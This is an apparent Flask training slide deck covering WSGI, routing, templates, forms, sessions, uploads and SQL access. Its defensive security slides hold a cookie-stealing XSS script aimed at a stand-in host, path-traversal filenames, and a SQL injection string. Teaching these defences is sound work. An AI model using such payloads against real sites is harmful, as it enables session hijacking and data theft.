Flask

title: Web development with Flask
author: Alexander Patrakov

Let's start from the basics ⌘

WSGI
Purpose of web frameworks
Available web frameworks
Place of Flask in the ecosystem

HTTP protocol ⌘

HTTP/1.1 is defined by RFC 7230 - RFC 7235 (since superseded by RFC 9110 - RFC 9112)
Browsers are the most popular clients
There are non-browser clients
Web servers deliver HTML, images, JS, CSS, downloadable files, other content types

HTTP Request ⌘

GET /html/rfc7240 HTTP/1.1
Host: tools.ietf.org
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,ru;q=0.6
Cookie: __cfduid=d105aee619396e6187d19c60cb032f4b71479467417

HTTP Response ⌘

HTTP/1.1 200 OK
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 13 Nov 2016 10:39:20 GMT
ETag: "3cc378-c260-5412c55f8017f;54191604efade"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Fri, 25 Nov 2016 11:15:54 GMT
Strict-Transport-Security: max-age=3600
Content-Length: 12952
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<other headers omitted for brevity>

<!DOCTYPE html ...

Python web applications ⌘

WSGI is the interface between the web server and the web application
- Defined in PEP 3333
The web server calls a callable for every request
- usually "application", but the name is configurable
It should take two parameters: environ and start_response
- environ is a dict with CGI-like parameters
  - also contains the "input" stream used for POST content
- start_response(status, response_headers, exc_info=None) is a callback
  - should be used by the application to set the response headers and status code
The callable itself should return an iterable which supplies pieces of content (byte strings)
WSGI is not good for websockets!
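To make the calling convention concrete, here is a minimal sketch of what a web server does for a single request. The call_wsgi helper is a hypothetical name invented for this illustration; only wsgiref from the standard library is used.

```python
from wsgiref.util import setup_testing_defaults


def application(environ, start_response):
    # A trivial WSGI callable: plain-text body that echoes the request path.
    body = ('You asked for ' + environ['PATH_INFO']).encode('utf-8')
    start_response('200 OK', [('Content-Type', 'text/plain; charset=utf-8'),
                              ('Content-Length', str(len(body)))])
    return [body]  # an iterable of byte strings


def call_wsgi(app, path):
    """Play the role of the web server for one request (illustration only)."""
    environ = {'PATH_INFO': path}
    setup_testing_defaults(environ)  # fills in the remaining CGI-like keys
    captured = {}

    def start_response(status, response_headers, exc_info=None):
        # The application reports status and headers through this callback.
        captured['status'] = status
        captured['headers'] = response_headers

    chunks = app(environ, start_response)
    return captured['status'], captured['headers'], b''.join(chunks)


status, headers, body = call_wsgi(application, '/demo')
```

A real server additionally streams the chunks to the socket and handles errors; the sketch only shows who calls whom.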

Simplest Python web application ⌘

(use it with Apache's mod_wsgi, or run from command line)

#!/usr/bin/env python3

from wsgiref.simple_server import make_server

def application(environ, start_response):
    status = '200 OK'
    # PEP 3333 requires the body to be bytes; a b'' literal also works on Python 2
    output = b'Hello World!'

    response_headers = [('Content-type', 'text/plain'),
                        ('Content-Length', str(len(output)))]
    start_response(status, response_headers)

    # The return value is an iterable of byte strings
    return [output]

if __name__ == "__main__":
    httpd = make_server('', 8000, application)
    httpd.serve_forever()

Exercise: try the raw WSGI ⌘

Can you print the complete WSGI environment to the browser?
Can you handle two different URLs? ("Hello world" and environment)

Tasks of a web framework ⌘

Routing
Sessions
Response formatting
Input validation
Database communication
Structuring your application

Available web frameworks ⌘

Batteries included
- Self-contained and comprehensive
- Examples: Django, TurboGears, web2py
Best of breed
- Just a thin layer of glue between other libraries
- Examples: Flask, Pyramid, CherryPy, Bottle

Flask as compared to other web frameworks ⌘

Minimalistic
Commonly used for APIs and single-page applications
- Traditional web applications with forms are also possible
Non-MVC by default - does not supply the model layer
- But you can support MVC in your application
Modern and actively developed
Relies on established technologies via third-party libraries
Does not constrain the developer in terms of application architecture

Flask criticisms ⌘

You are the only architect of your application
- There is no scaffolding
- With great power comes great responsibility
Many extensions of varying quality and fitness for your purpose
- Sometimes it is easier to code the necessary functionality from scratch
Sad story about user authentication

Installation ⌘

Flask is best installed into a virtualenv

virtualenv3 flask-env
cd flask-env
. bin/activate
pip install flask

Also included as a package in Debian and Ubuntu
- Likely outdated, but still works
- Not recommended unless you absolutely need something that never changes
Flask supports both Python2 and Python3

Flask is a glue ⌘

Glues together:
- Werkzeug for HTTP request and response abstractions, as well as interactive debugger
- Jinja2 for templating system
- Itsdangerous for secure cookies (used for sessions)
Provides:
- Structuring your application into a set of blueprints
- URL routing for blueprints
- Error handling
- Configuration system

Hello World ⌘

Save as app.py
FLASK_APP=app.py flask run

from flask import Flask

application = Flask(__name__)

@application.route('/')
def index():
    return u'Hello, World!'

Return value of a view function ⌘

Any of the following:
- A ready-made flask.Response object
  - Use make_response to create it, and then you can post-process it
- Unicode string
  - Will be converted to UTF-8 and served as text/html
- Byte string
  - Will be served as text/html
- A tuple of (response, status, headers) or (response, headers)

More routing ⌘

View functions can take arguments extracted from the URL path
Example:

@app.route('/news/<slug>')
def news(slug):
    pass  # slug is a string that must not contain slashes

It is also possible to convert some types like int:

@app.route('/user/<int:userid>')
def show_user(userid):
    pass  # userid is an integer

Acceptable converters ⌘

General syntax: <type(args):variable_name>
string, int, float, uuid: do the obvious thing
string is just the default converter
UUIDs are converted to uuid.UUID objects, so you can be sure they are valid
path: string that can contain slashes
any(foo,bar,baz): accepts only foo, bar or baz
See Werkzeug documentation for all acceptable parameters
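A short sketch of the converters in action, assuming Flask is installed. The route paths and view names are made up for this illustration; the test client is used so that no server has to be started.

```python
from flask import Flask

app = Flask(__name__)


@app.route('/files/<path:filename>')
def show_file(filename):
    # path: like string, but slashes are allowed
    return 'file: ' + filename


@app.route('/lang/<any(en,de,ru):code>')
def set_language(code):
    # any(...): only the listed values match, anything else is a 404
    return 'language: ' + code


@app.route('/page/<int:number>')
def show_page(number):
    # int: the view receives a real integer, so arithmetic works
    return 'next page: %d' % (number + 1)


client = app.test_client()
nested = client.get('/files/a/b/c.txt').get_data(as_text=True)
unknown_language = client.get('/lang/fr').status_code
next_page = client.get('/page/7').get_data(as_text=True)
```

A URL that does not satisfy the converter simply does not match the route, so the view never sees invalid input.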

About trailing slashes ⌘

By default, if you include a trailing slash in your route, Flask will generate a redirect if it sees the same URL without a slash
To turn off:

app = Flask(__name__)
app.url_map.strict_slashes = False

Flask extensions ⌘

Extensions add support for common tasks (like connecting to a database)
Good question: why do we need an extension?
Answer: to reduce boilerplate code, e.g. connecting to the database at the beginning of each request.
Here is an example of how to use one:

from flask import Flask
from flask_peewee.db import Database

# General pattern:
# 1. Create app
app = Flask(__name__)
# 2. Add configuration specific to the extension
app.config['DATABASE'] = {
    'name': 'example.db',
    'engine': 'peewee.SqliteDatabase',
}
# 3. Instantiate the extension, passing app as a parameter
db = Database(app)

Common extensions ⌘

Internationalization: Flask-BabelEx
Dealing with file uploads: Flask-Uploads
Processing forms: Flask-WTF
Interfacing with databases: Flask-SQLAlchemy and Flask-Peewee
Creating REST-like APIs: Flask-RESTful (general case), Flask-Restless (for SQLAlchemy-managed database records)
Enough for now

Do we need an extension to use something? ⌘

Good question!
Case study: Flask-WTF
WTForms are framework-neutral
Flask-WTF connects Flask-specific Request class to WTForms
so WTForms can get the data from there automatically
Same for file uploads
Case study: Flask-Peewee
Written by the same author as the Peewee ORM itself
The Peewee page documents the recommended way to use Peewee from Flask
Without the extension!
All you need is to connect to the database at the beginning of the request and disconnect at the end
The extension includes some extra functionality, but this extra functionality is deprecated

Templates ⌘

Templates are incomplete HTML pages, which require post-processing
values have to be inserted
pieces such as table rows have to be repeated
some parts may be displayed conditionally
there is a hierarchy of inheritance
Templates live in the templates directory

Rendering templates ⌘

At the top of the file: from flask import render_template
In the view function: flask.render_template(template_name_or_list, **context)
context provides extra variables for the template to use
request, g, session and app.config (as config) are always available

Template syntax ⌘

Jinja2 is the underlying engine
Write whatever HTML code is needed - it will be delivered to the browser
To display a variable, write {{ variable }}
attribute access and array element access also work
some functions (e.g. url_for) are also available
Conditional printing: {% if foo %} ... {% else %} ... {% endif %}
Looping: {% for a in b %} ... {{ a }} ... {% endfor %}
There are macros
Equivalent of functions in other languages

Macros ⌘

Best explained via example from Flask-Security
In _macros.html:

{% macro render_field_with_errors(field) %}
  <p>
    {{ field.label }} {{ field(**kwargs)|safe }}
    {% if field.errors %}
      <ul>
      {% for error in field.errors %}
        <li>{{ error }}</li>
      {% endfor %}
      </ul>
    {% endif %}
  </p>
{% endmacro %}

In other templates:

{% from "security/_macros.html" import render_field_with_errors %}
{{ render_field_with_errors(login_user_form.email) }}
{{ render_field_with_errors(login_user_form.password) }}
{{ render_field_with_errors(login_user_form.remember) }}

XSS attacks ⌘

XSS = Cross-Site Scripting
Interpretation of malicious data as HTML (or, worse, JavaScript) by the browser
Reflected XSS: data from the query string are interpreted as HTML
Stored XSS: data from the database are interpreted as HTML
Typical exploitation scenario: write a "blog post" that also sends document.cookie to attacker when viewed by admin
Admin's session is now hijacked!
Solution: convert data from text to HTML
Also known as "escaping"
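The difference between pasting text into HTML and converting it first can be sketched with the standard library alone. The function names and the payload are invented for this illustration; Jinja2 does the equivalent conversion for you when autoescape is on.

```python
import html


def render_comment_unsafe(text):
    # Vulnerable: user-provided text is pasted into HTML as-is.
    return '<p class="comment">' + text + '</p>'


def render_comment(text):
    # Safe: the text is converted to HTML first, so markup characters
    # are displayed literally instead of being interpreted by the browser.
    return '<p class="comment">' + html.escape(text) + '</p>'


payload = '<script>new Image().src = "//evil.example/?" + document.cookie</script>'
unsafe_html = render_comment_unsafe(payload)
safe_html = render_comment(payload)
```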

CSRF attacks ⌘

CSRF = Cross-Site Request Forgery
A hacker makes a form on his website
The button says "View my photos"
The form actually submits to your bank (in hope that you are logged in) and asks it to transfer $100 to the hacker
WTForms protect you against CSRF
They include a hidden field in all forms and check it against a cookie
The hacker can't see or modify the cookie, so can't guess what should be in the hidden field
Don't forget to render the CSRF protection field: {{ form.hidden_tag() }}
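The idea behind the hidden field can be sketched as follows. This is not how WTForms or Flask-WTF actually implement it; the function names are hypothetical and only the principle (a secret value the attacker's page cannot read) is shown.

```python
import hmac
import secrets


def new_csrf_token():
    # Random value kept where the attacker's site cannot read it
    # (the user's session or a cookie).
    return secrets.token_urlsafe(32)


def render_hidden_field(token):
    # The same value is embedded into every form the site itself serves.
    return '<input type="hidden" name="csrf_token" value="%s">' % token


def is_request_legitimate(session_token, submitted_token):
    # A missing field counts as a mismatch; the comparison is constant-time.
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token.encode('utf-8'),
                               submitted_token.encode('utf-8'))


token = new_csrf_token()
```

The forged form on the hacker's site has no way to learn the token, so its submission fails the check.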

How variables are escaped ⌘

Autoescape is on for all templates with .html, .htm, .xml and .xhtml extensions
With autoescape:
If it is an object with an __html__ attribute, then this attribute is called as a function, and the result is used as-is
Otherwise, the object is converted to unicode and then the result is escaped
The logic is in the markupsafe.escape function
If you already have a piece of HTML in a string, make a Markup object from it and print it
Use unicode for text (that needs escaping) and Markup for HTML fragments (that don't need escaping)
Alternatively, use this inside the template: {{ something|safe }}
Without autoescape, all variables are simply converted to unicode

How to format objects for JavaScript ⌘

var myobj = {{ mydict }}; won't work
Reason: you want to transform to JSON, not to string with HTML escaping
This pattern works:

<script><!--
var myobj = {{ mydict|tojson }};
--></script>
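Why the plain {{ mydict }} form fails can be seen without Flask: the string form of a Python dict is not valid JavaScript, while JSON is. The sample dictionary is made up for this illustration.

```python
import json

mydict = {'name': "O'Hara", 'active': True, 'manager': None}

# What str() produces: Python literals such as True and None.
as_python_repr = str(mydict)

# What a JSON encoder produces: true and null, which JavaScript understands.
as_json = json.dumps(mydict)
```

As far as I know, the tojson filter also escapes characters such as < and > so that the data cannot terminate the script element; plain json.dumps does not do that.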

With Flask before 0.10, you also needed to add |safe at the end

How to provide some variables to all templates ⌘

Common use cases: user name, cart item count, ...
They are usually displayed in the navigation bar and thus should be always available
Solution: write a context processor

@app.context_processor
def inject_user():
    return dict(user=current_user)

Template inheritance ⌘

You definitely don't want to write the whole HTML for every dynamic page
There are too many common parts, e.g. the general theme
Solution: create a base template and extend it
In the base template, mark the replaceable parts with {% block foo %}...{% endblock foo %}
The block tag both denotes a "pluggable hole" and the default content there
Child templates can override the content
Sometimes it is a good idea to create blocks both inside and outside certain HTML tags
So that you can either fill in the tag with the relevant content, or remove it completely
At the top of the child template, put {% extends "base.html" %}
Then, write the overrides for some blocks: {% block foo %}...{% endblock foo %}
{{ super() }} inside the overridden block gets back the default content
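A compact sketch of a base template and a child, assuming Jinja2 is installed (it comes with Flask). The templates are kept in a DictLoader only to make the example self-contained; in a Flask application they would be files in the templates directory.

```python
from jinja2 import DictLoader, Environment

templates = {
    'base.html': (
        '<title>{% block title %}My site{% endblock title %}</title>\n'
        '<main>{% block content %}Nothing here yet{% endblock content %}</main>'
    ),
    'child.html': (
        '{% extends "base.html" %}\n'
        # super() brings back the default content of the block
        '{% block title %}News - {{ super() }}{% endblock title %}\n'
        '{% block content %}Hello, {{ name }}!{% endblock content %}'
    ),
}

env = Environment(loader=DictLoader(templates), autoescape=True)
page = env.get_template('child.html').render(name='<World>')
```

Only the blocks are taken from the child; everything else comes from the base template.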

Static files ⌘

Images, javascript and css files, fonts, ...
Not processed by Python
Put them into the static folder
Flask will serve them from the /static URL
But you should really configure your web server to do that instead
And please don't hard-code /static in URLs
Please use url_for('static', filename='...') instead

Good starting points ⌘

Minimal:
Almost nothing: HTML5 Boilerplate
With a bit of responsive theming: Initializr
Popular:
Does not need any introduction: Bootstrap
There is a Flask-Bootstrap extension that contains some handy functions
The most advanced responsive CSS framework: Foundation
This thing evolves very fast, beware!

What about static content like help pages? ⌘

Help pages cannot be static files
Navigation bar still contains dynamic content
Still, a simple solution for them all is wanted
What you probably want is the Flask-FlatPages extension
Serves flat pages from Markdown-based static files
The extension itself only returns a rendered piece of HTML for static content, it's your task to put it into a proper template
It's a good idea to use a catch-all route, to be added last

@app.route('/<path:path>/')
def page(path):
    page = pages.get_or_404(path)
    template = page.meta.get('template', 'flatpage.html')
    return render_template(template, page=page)

In a template, you can also access things like page.title, to be fetched from the YAML block at the top of the file

Returning JSON ⌘

Use the jsonify helper

from flask import jsonify

# in a view:
    return jsonify(some_object)

The helper in this case sets the correct MIME type (application/json)

Returning redirects ⌘

from flask import redirect

# in a view:
    return redirect(some_url)

Returning custom headers and error pages ⌘

You can return a Response object from your view
Make it with make_response()
Set response.headers['...'], mimetype and/or status_code
Alternatively, return a tuple of response_string, status, headers from a view function
Or even response_string, status_or_headers and Flask will guess what you mean
To return a pre-designed HTTP error page (e.g. a 404): abort(404)
To customize the 404 page:

from flask import render_template

@app.errorhandler(404)
def page_not_found(e):
    return render_template('404.html'), 404

Application context ⌘

WSGI interface is composable, so there may be more than one app
This is an advanced use case, we will not do that
Anyway, in a particular thread at a given moment, at most one is active
It is sometimes too cumbersome to pass the application everywhere
Solution: use the current_app context-local variable
It does not work if no application is active
with app.app_context(): current_app.do_something()
Pushes the application context onto the stack, does something, then pops it off the stack
The problem only manifests itself in code that runs outside view functions
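A small sketch of the behaviour, assuming Flask is installed. SITE_NAME and the site_name helper are hypothetical names used only for this illustration.

```python
from flask import Flask, current_app

app = Flask(__name__)
app.config['SITE_NAME'] = 'Demo'


def site_name():
    # A helper that does not receive the app explicitly.
    return current_app.config['SITE_NAME']


try:
    site_name()
    worked_outside_context = True
except RuntimeError:
    # No application is active here, so current_app cannot be resolved.
    worked_outside_context = False

with app.app_context():
    # Inside the block the application context is active.
    name_inside_context = site_name()
```

Inside a view function the context is already there, which is why the issue shows up mostly in scripts, shells and background jobs.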

Request context ⌘

Same story: due to internal redirects, there may be more than one request
This is also an advanced use case
Anyway, in a particular thread at a given moment, at most one request is active
Flask keeps the current request in the request context-local variable
It is sometimes useful to create a test request and push it onto the stack

What's in the request object ⌘

method: the HTTP method, e.g. "GET" or "POST"
args: stuff after the question mark in the URL, parsed into something like a dictionary
form: same for POST variables (application/x-www-form-urlencoded or multipart/form-data)
These two are also combined into values
files: files uploaded via the form
cookies: incoming cookies
headers: HTTP headers
get_json(): here is how to convert the incoming application/json data into Python objects

On duplicate parameters: MultiDict ⌘

http://example.com/something?i=1&foo=bar&foo=baz

This is valid
request.args['foo'] takes the first value, i.e. bar
To get them all as a list, use request.args.getlist('foo')
No foo? Get an empty list
request.args['does_not_exist'] still raises a KeyError
A nice feature is that you can do type conversions like this: request.args.get('i', type=int)
A default value can also be passed
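The rules above can be tried without a browser, assuming Flask is installed. A test request context stands in for a real request; the page parameter is a hypothetical one that is absent from the URL.

```python
from flask import Flask, request

app = Flask(__name__)

with app.test_request_context('/something?i=1&foo=bar&foo=baz'):
    first_foo = request.args['foo']                       # first value only
    all_foo = request.args.getlist('foo')                 # every value
    no_such_list = request.args.getlist('does_not_exist')
    i_as_int = request.args.get('i', type=int)            # converted to int
    page = request.args.get('page', default=1, type=int)  # falls back to 1
    try:
        request.args['does_not_exist']
        raised_key_error = False
    except KeyError:
        raised_key_error = True
```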

Validating requests ⌘

Of course it is possible to validate request.form or request.args by hand
A better alternative is to use a form validation library
Common choice: WTForms, via the Flask-WTF extension
Tasks simplified by WTForms:
Conversion between strings and native data types, both ways
E.g. sometimes you need to display something in a form for editing
Display of common HTML5 input-like tags
Arbitrary per-field or whole-form validation
Displaying useful error messages near the invalid field

Flask-WTF boilerplate ⌘

from flask_wtf import FlaskForm
from wtforms.fields import *
from wtforms.validators import *

# Some people prefer this:
# from flask_wtf import FlaskForm as BaseForm

# Then use FlaskForm (or BaseForm) as a base class for your forms, e.g.:

class MessageForm(FlaskForm):
    recipients = StringField('Recipients',
                             validators=[InputRequired(message='No recipients provided')])
    message = TextAreaField('Your message',
                             validators=[InputRequired(message='Message cannot be empty')])
    submit = SubmitField('Submit')

WTForms field types ⌘

Obvious: StringField, IntegerField, FloatField (rarely used), DecimalField
These render as <input type="text">
On form submission, they coerce the string into the correct type
Special rendering but nothing else: HiddenField, PasswordField, TextAreaField
Choice-related: SelectField, RadioField, SelectMultipleField
They accept the choices=... keyword argument, and render as the corresponding HTML5 tags
There are also FileField, DateField, DateTimeField, SubmitField, and others
You can create custom fields, too
Out of scope for this training

Typical structure of a view with a form ⌘

Typical usage pattern with Flask-WTF:

@app.route('/submit', methods=('GET', 'POST'))
def submit():
    form = MyForm()
    if form.validate_on_submit():
        do_something()
        return redirect('/success')
    return render_template('submit.html', form=form)

The validate_on_submit method comes from Flask-WTF, not wtforms!
If you need to pass form data from sources other than request.form
Pass it to the form constructor instead (formdata=... for a MultiDict, data=... for a plain dictionary), then call form.validate()
Maybe disable CSRF validation via keyword argument: meta={'csrf': False}
If you want to edit some ORM object, pass it as obj keyword parameter to the form constructor
It will be checked for matching attributes if there is nothing POSTed

How WTForms validates the form ⌘

It calls all field validators until one raises StopValidation
This includes validators passed during field construction, and the validate_fieldname() method on the form
If you need form-level validation, override the validate method
The real question without a good answer is where to put the resulting errors

How to get the data and errors from the form ⌘

Many ways to access validated data:
form.my_field.data - None if there were errors
form.data - expensive, generated each time you access it
form.populate_obj(some_object) - may be useful with ORMs
And get errors:
form.my_field.errors - this is a list of messages
form.errors - this is a dictionary which contains only fields with errors (name => list of messages)

WTForms built-in validators ⌘

All validators accept a message keyword argument
Optional: put it first if an empty field should not be checked by other validators
InputRequired: fails if the user entered nothing
DataRequired: fails if the user did not enter anything that can be coerced into a truthy value of the target type
Almost never useful - bans 0, 0.0 and similar values for integer and decimal fields
Length, NumberRange
Regexp, Email, URL
AnyOf, NoneOf
There are others
You can create custom validators
Look at the source, create classes in the same way, raise ValidationError when needed

How to display form fields ⌘

Just mention them like this: {{ form.myfield }}
Or, call them to set additional HTML attributes: {{ form.myfield(class_="fancy") }}
There is also a pre-made label for each field: {{ form.myfield.label }}
This is for the use case when the label is near the field's input tag
The other possibility offered by the HTML standard is to make the input a subelement of the label
WTForms doesn't do this, but you can hand-code it
You should be able to display errors based on form.myfield.errors
The form itself does not have an __html__ method
But you can iterate over it to get the fields
Don't forget {{ form.hidden_tag() }} (comes from Flask-WTF, for CSRF protection)

Dealing with file uploads ⌘

Werkzeug has request.files which is a MultiDict of FileStorage objects
You can use it directly
Useful properties: filename, content_type, content_length
You can call a save method to save it to a file
Or you can access it via the stream property (either in-memory representation or a temporary file)
WTForms don't handle file uploads
Flask-WTF has FileField
form.my_file_field.data refers to Werkzeug's FileStorage

File upload security ⌘

Hackers can provide any filename
Including ../../../../../tmp/hacked.txt!
Or evil.jpg.php
Be careful
Whitelist allowed mime types and extensions
Check filenames
werkzeug.utils.secure_filename strips out the bad stuff but can return an empty or non-unique filename
Always rename the uploaded file to something safe and unique
Limit the maximum file size
The Flask-Uploads extension can help you with these tasks
It also supports serving uploaded files
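The "whitelist and rename" advice can be sketched with the standard library only. The extension whitelist and the storage_name_for helper are assumptions made for this illustration; adapt them to your application.

```python
import os
import uuid

ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif'}  # assumed whitelist


def storage_name_for(client_filename):
    """Return a safe, unique name for storing the upload, or None to reject it."""
    # Only the final extension of the client-supplied name is looked at.
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    # Nothing else from the client's name survives, so path tricks are moot.
    return uuid.uuid4().hex + ext


rejected = storage_name_for('evil.jpg.php')
accepted = storage_name_for('../../etc/cat.JPG')
```

The extension check alone does not prove that the content is an image, and the maximum request size still has to be limited separately, e.g. with Flask's MAX_CONTENT_LENGTH configuration key.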

Configuration system ⌘

app.config looks like a dictionary
You can also update it from various sources
app.config.from_object
Imports the module provided as an argument, takes everything that has all-uppercase names
app.config.from_envvar
Loads the file whose name is stored in the environment variable named by the argument
it should contain lines like DEBUG = False

Mandatory configuration ⌘

SECRET_KEY = 'some long string that nobody can guess'
Used for secure cookies in sessions

Handling non-GET requests ⌘

By default, @app.route(...) registers only the handler for GET requests
Add the methods=("GET", "POST") keyword argument to override the default
GET implies HEAD
OPTIONS is always implied and, if necessary, routed to the internal handler

Session ⌘

A way to store some data between requests made by the same client
Just use flask.session as a dict that can only hold serializable values
Flask session is, by default, based on signed cookies
Cookies are signed using the secret key, so keep it non-guessable
Limitations:
You cannot store secrets there (a client can do URL-safe base64 decoding and gzip decompression to get the data)
You cannot store too much data
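Why a signed cookie is readable but not forgeable can be sketched with the standard library. This is not the actual format used by itsdangerous; the encoding and the function names are simplified assumptions.

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = b'some long string that nobody can guess'


def dump_session(data):
    payload = base64.urlsafe_b64encode(json.dumps(data).encode('utf-8'))
    signature = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    return payload.decode('ascii') + '.' + signature


def load_session(cookie):
    payload, _, signature = cookie.rpartition('.')
    expected = hmac.new(SECRET_KEY, payload.encode('utf-8'),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(signature.encode('utf-8'),
                               expected.encode('utf-8')):
        return None  # tampered with, or signed with another key
    return json.loads(base64.urlsafe_b64decode(payload))


cookie = dump_session({'user_id': 42})

# Anyone can read the payload without knowing the key...
peeked = json.loads(base64.urlsafe_b64decode(cookie.split('.')[0]))

# ...but changing it invalidates the signature.
forged_payload = base64.urlsafe_b64encode(b'{"user_id": 1}').decode('ascii')
forged = forged_payload + '.' + cookie.split('.')[1]
```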

Flashing messages ⌘

Flashing a message means storing it at the end of the request so that it can be displayed at the next request
Here is how to flash a message:

from flask import flash

...
# in a view function
flash('A message', 'error')

To get flashed messages, use the get_flashed_messages() function in a template. Something like this:

{% with messages = get_flashed_messages(with_categories=True) %}
  {% if messages %}
    <ul class=flashes>
    {% for category, message in messages %}
      <li class="{{ category }}">{{ message }}</li>
    {% endfor %}
    </ul>
  {% endif %}
{% endwith %}

The names of message severities do not match those used by Bootstrap
Flask-Bootstrap contains a utility to display them, too:

{% import "bootstrap/utils.html" as utils %}
{% with messages = get_flashed_messages(with_categories=True) %}
  {% if messages %}
    <div class="row">
      <div class="col-md-12">
        {{ utils.flashed_messages(messages) }}
      </div>
    </div>
  {% endif %}
{% endwith %}

How to structure a Flask application ⌘

Ugly and fragile circular imports are a common issue
The official documentation dismisses them as something acceptable, but in fact they are avoidable
In app.py, create the application and populate its config
Do nothing else
In models.py, initialize the ORM-related extension and describe models
You will need to import app, or use init_app() later
If you want to use Flask-Admin for the administrative interface, do everything related in admin.py
You will need to import app and all models
In forms.py, describe the forms
A common way to do so is to use wtforms via Flask-WTF
As with any Flask extension, you need to import the app or use init_app() later
Some forms will be based on models, so you need to import them
In other files, do other things needed by your application
Collect everything in main.py, initialize all extensions
And then point "flask run" to it

Signals ⌘

Signals are a way to decouple policy from mechanism
Policy: what should be done when a user registers?
Mechanism: what does it mean that the user registered?
Signals are available when the blinker library is installed

import blinker
signals = blinker.Namespace()
user_registered = signals.signal("user-registered")

How to emit:

    user_registered.send(app._get_current_object(),
                         user=user, confirm_token=token)

How to subscribe:

def my_callback(sender, user, confirm_token, **extra):
    pass

user_registered.connect(my_callback)

Flask has some built-in signals like template_rendered, request_started
They are useful for profiling and tracing

Decorator-based hooks ⌘

Flask has an ability to register functions that run at certain stages of request processing
Unlike signals, they can modify the request or response, or even prevent the normal view function from running
See after_request(), before_first_request(), before_request(), errorhandler(), teardown_appcontext(), teardown_request()

Blueprints ⌘

Logical parts of the app
Can contain view functions, templates, static files
If you think "let's convert my views.py file into a package", better think about blueprints

from flask import Blueprint

bp = Blueprint('captcha', __name__)  # and possibly other keyword arguments

# Then use it like an app. E.g.:
@bp.route('/captcha.jpg')
def captcha():
    pass

# Any setup code goes here
def bp_setup(state):
    app = state.app
    blueprint = state.blueprint
    # ...

bp.record_once(bp_setup)

You have to register your blueprints on an app

from captcha import bp as captcha_bp

app.register_blueprint(captcha_bp)

MVC ⌘

Model, View, Controller
A common pattern for application design
Or maybe just a buzzword that only indicates that Models, Views and Controllers exist, with some separation of concerns
Flask is not an MVC framework, but your application can still be based on this pattern
Wikipedia's articles on MVC, MVP (Model, View, Presenter) and similar software architectures are written with classical GUI-based software in mind
The English Wikipedia MVC interaction diagram (below) doesn't apply to web frameworks
Non-English editions of Wikipedia even have different interaction diagrams!

MVC in web frameworks: Model ⌘

Model:
Has business-domain knowledge (both logic and data)
Provides API that can be used by the controller to read state and submit updates
Does not contain presentation logic
Note: in many other ORMs and web frameworks, a model is only an abstraction over data storage (such as a database) and a validation mechanism, i.e. there is no emphasis on an API that makes sense in the business problem domain.
Good article on the issue, by Julien Pauli
Even the data you get from web services can be expressed as a Model!
With Flask, the model layer is to be supplied by you, the developer
You can base it on SQLAlchemy for data persistence

MVC in web frameworks: View ⌘

View:
Presents data to the user
Usually as HTML
Data can come from the model and from the controller
Templates!

MVC in web frameworks: Controller ⌘

Controller:
Reacts to user actions (in the form of HTTP requests)
Decides what to do
Updates model state, or queries state from the model
Asks the appropriate view to render itself, supplies the necessary data
Frequently advocated approach: fat models, skinny controllers
StackOverflow discussion
View functions!

Database topics ⌘

Making SQL queries from Python
Ways to avoid SQL injection
SQLAlchemy vs Peewee
Defining tables
Selecting data
Joins
Inserting, updating and deleting data
Transactions

Making SQL queries from Python ⌘

DB API 2.0 specification
A standard which database-interfacing modules follow
You can connect to the database, issue queries, get results
There is a mechanism for using prepared queries and substitution of parameters

import sqlite3
db = sqlite3.connect('test.sqlite')
cur = db.cursor()
cur.execute('SELECT id, dname FROM dept WHERE loc = ?', ('Berlin',))
rows = list(cur)
db.commit()

SQL injection ⌘

A serious vulnerability
Appears when an application constructs SQL query dynamically by concatenating fixed strings with attacker-provided data
By using special characters (like ') inside their data, an attacker can trick the SQL database into interpreting their data as additional SQL
Can bypass access restrictions, exfiltrate data, make unauthorized changes

How to avoid SQL injection ⌘

Answer from 1990s: forbid bad characters in user input
Bad: how would you register Catherine Anne O'Hara as a user?
Answer from 2000s: "escape" user data before concatenation so that special characters are properly interpreted as data, not as SQL syntax
Bad: too hard to keep track of what's escaped and what's not
Too easy to forget to escape data
Answer from 2010s: don't build queries by concatenating fixed strings with user-provided data
"Prepared Statement" APIs exist that clearly separate SQL from external data in queries
Usually (but not always), they stay separate on the wire. If the database doesn't provide this option, the client library will escape and concatenate strings as necessary.

How to avoid SQL injection, once again ⌘

Don't:

cur.execute("SELECT id, dname FROM dept WHERE loc = '%s'" % (city,))

Do:

cur.execute('SELECT id, dname FROM dept WHERE loc = ?', (city,))

Or just let your favorite ORM generate queries for you.
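Both variants can be tried against a throwaway in-memory SQLite database. The table contents and the malicious input are made up for this demonstration.

```python
import sqlite3

db = sqlite3.connect(':memory:')
db.execute('CREATE TABLE dept (id INTEGER PRIMARY KEY, dname TEXT, loc TEXT)')
db.executemany('INSERT INTO dept (dname, loc) VALUES (?, ?)',
               [('Sales', 'Berlin'), ('Research', 'Paris')])

city = "nowhere' OR '1'='1"  # attacker-controlled input

# Don't: the quote inside the input ends the string literal early,
# and the rest of the input is interpreted as SQL.
unsafe_rows = db.execute(
    "SELECT id, dname FROM dept WHERE loc = '%s'" % (city,)).fetchall()

# Do: the value is passed separately from the SQL text.
safe_rows = db.execute(
    'SELECT id, dname FROM dept WHERE loc = ?', (city,)).fetchall()
```

The concatenated query returns every department, although no department is located in a city with that name.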

Why we need ORMs ⌘

SQLite on dev, PostgreSQL in production
Slight differences in SQL syntax
E.g. here is how to create a suitable id field in SQL:
SQLite: id INTEGER PRIMARY KEY (autoincrement is optional, and the AUTOINCREMENT keyword, if present, must be placed last)
MySQL: id INTEGER AUTO_INCREMENT PRIMARY KEY
PostgreSQL: id SERIAL PRIMARY KEY
